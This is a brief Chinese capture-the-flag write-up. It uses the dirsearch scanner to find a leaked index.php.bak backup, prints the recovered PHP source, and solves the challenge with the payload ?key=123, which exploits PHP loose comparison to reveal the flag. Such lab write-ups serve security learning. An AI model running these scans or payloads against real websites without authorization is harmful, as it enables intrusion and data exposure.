根据提示,是备份文件泄露
查找大佬文章,知道用一个新工具
dirsearch
目录扫描
使用方法:
在dirsearch目录下cmd
然后命令
py dirsearch.py -u url地址 -e*
然后找到index.php.bak文件
删去bak,打开index.php
<?php
include_once "flag.php";
if(isset($_GET['key'])) {
$key = $_GET['key'];
if(!is_numeric($key)) {
exit("Just num!");
}
$key = intval($key);
$str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";
if($key == $str) {
echo $flag;
}
}
else {
echo "Try to find out source file!";
}
得到payload
?key=123
然后得到flag